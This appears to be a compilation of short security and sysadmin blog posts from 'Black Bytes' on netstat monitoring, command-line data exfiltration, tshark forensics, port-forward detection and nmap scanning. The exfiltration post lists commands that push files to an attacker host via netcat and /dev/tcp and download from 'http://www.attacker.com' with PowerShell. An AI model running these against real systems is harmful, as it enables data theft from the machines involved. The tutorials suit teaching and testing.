-a all
-n show ip instead of host names
-t show only tcp connections
-p show process id/name

Another command that will give you similar results is: lsof -nPi

What if you wanted to see the 10 ip addresses with the most connection to your server? You could use a one-liner like this one I came up with:

netstat -ant | grep -i establ | awk -F" " '{print $5}' | cut -d':' -f 1 | sort -n | uniq -c | sort -nr | head -n10

You can also see the connections live as they are being made. For that you can use the “watch” command, which will re-run any command every X seconds (by default 2 seconds) and show you the output. So if you wanted to see all the connections for port 80 updated every five seconds you would do this:

watch -n5 "netstat -antp | grep :80"

There are other tools that also let you see live connections, and even get an idea of the traffic you are getting. These tools are iptraf and iftop . If you need to see the actual data going through your network you will need a packet sniffer like tcpdump or wireshark.

Related posts:
Tshark network forensics

The post Watching your network appeared first on Black Bytes.

Generic

Samba can be configured on the attacker machine so that you can connect from the vulnerable
machine using the “net use” (windows) or “mount -t cifs” (linux) commands and then transfer files.

example:
net use z: \\192.168.1.20 /u:attacker

smb.conf http://www.samba.org/samba/docs/using_samba/ch06.html

FTP is another way we can do this, but remember that both the data and the login credentials travel in plain text, also since the client is interactive if you have a non-interactive shell you will need to script it.

example for the windows ftp client:
open ftp.domain.com
username
password
get file.txt
bye

run with ftp -s:script-name.txt

example for the linux ftp client:
http://www.stratigery.com/scripting.ftp.html

TFTP is a simpler version of ftp, it uses UDP and it doesn’t support authentication, a popular tftp server is Tftpd32. It’s still in use for things like backing up a router configuration or uploading the latest firmware.

SSH will allow us to transfer data in a safe manner, we can use the scp command to transfer files via ssh.

Netcat is also an option, it is usually available in most linux distributions, and there is also a
windows version. If you need encryption then you should try cryptcat or socat.

example:
echo data | nc 192.168.1.20 80

Linux specific

On linux you can use /dev/tcp/<host>/<port> to open connections to other host (you need to use a recent version of Bash for this to work), then we can use netcat to capture this data on the other end.

example:
echo secret_data.txt > /dev/tcp/192.168.1.20/500

Windows specific

In windows we can use powershell to open tcp connections, or download files from http.

example:

$http = New-Object System.Net.WebClient

    $url  = "http://www.attacker.com"
    $file = "test.html"

    $http.DownloadFile($url, $file)

As you can see there are many ways for transferring files, so pick the one that suits you best and enjoy!

The post Data exfiltration from the CLI appeared first on Black Bytes.

Extracting host names with tshark

Since we are dealing with mostly http traffic we may be interested in the sites that have been visited. To obtain this information we can use the http.host field and then a bit of sorting and this will show us the top 10 sites.

tshark -T fields -e http.host -r tor.pcap > dns.txt
cat dns.txt | sort | uniq -c | sort -nr | head

User agents

tshark -R 'http contains "User-Agent:"' -T fields -e http.user_agent -r tor2b.pcap | sort | uniq -c | sort -nr | less

The option -R allows us to define display filters, in the same way we would in wireshark. You can find a list of useful display filters here.

Email address

Another interesting bit of data are email addresses, which we can extract by using a regexp on the raw data.

tshark -r tor.pcap -R "data-text-lines" -T fields -e text > alldata.txt
grep -Eio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' alldata.txt | sort | uniq

Requested urls

We can also get a list of all the requested URLs (via the GET method):

tshark -r http-traffic.pcap -T fields -e http.host -e http.request.uri -Y 'http.request.method == "GET"' | sort | uniq | less

Don’t forget to take a look at the official documentation.

The post Network forensics with tshark appeared first on Black Bytes.

Setting up our lab

For this experiment we will need 3 host, in my case I have 2 Linux VM and a windows box. One of them will be used for scanning with nmap and send packets with hping, the second is going to be our NAT/firewall device and the windows machine will host the real service.

Firewall setup

In case you need a refresher on iptables take a look at this link. We will need 2 rules for portforwading: one will change the destination IP and port of the received packet (prerouting) and the other will change the source ip (masquerade) so it seems that the connection is coming from the firewall instead of the client, also this will add an entry on the conn_track table so when the response comes back it can be routed correctly.

iptables -t nat -A PREROUTING -p tcp --dport -j DNAT --to
iptables -t nat -A POSTROUTING -o -j MASQUERADE

In addition we have to enable ip forwading:
echo 1 > /proc/sys/net/ipv4/ip_forward

Now we can test if the rules work from our scanning machine, we scan the port that is being forwaded and check if the rule counter has increased with the following command:

iptables -T -t nat -v

If the “pkts” column has increased after the scan then the rules are probably working correctly.

Putting things together

At this point the only thing left is running some service on the destination host and test with nmap that the port is open, then we can proceed to see how we can tell the forwarded port from a local service. For this we will use hping with the –syn option to send a packet with the SYN bit set and -p to indicate our target port (in our case this will an open port on the firewall). We will observe the different header values we get in the response (TTP, ID, and window size), these will give away the forwarded port.

And finally we will launch another hping against the firewall, but this time with the port that we suspect is being forwarded, note how all three values (TTL, ID, and window size) have changed. This tells us that the host responding to this connection attempt is a different one. In addition, we can use these values for passive OS recon.

That’s it for now! We have seen how to set up ip forwarding and how we can learn information about the target network using the packet header fields using tools like hping.

The post Playing with firewalls: setting up and detecting port forwarding. appeared first on Black Bytes.

sudo nmap -sS -p 80 66.187.104.70 --open --reason --packet-trace

More advanced nmap

Another useful thing you can do with nmap is a reverse dns scan, using the -sL option and a bit of awk magic you can get output like this:

nmap -sL 66.187.104.70/24 -oG - | grep -v '(\w*)' | grep -v Nmap | awk '{ print $2 " " $3 }'

You could also use the –traceroute option and save the results to xml format using -oX, then load this into zenmap for visualization.

If you want to learn more take a look at the online nmap book here or you can buy the full book from amazon: Nmap Network Scanning: The Official Nmap Project Guide

The post Nmap: beyond the basics appeared first on Black Bytes.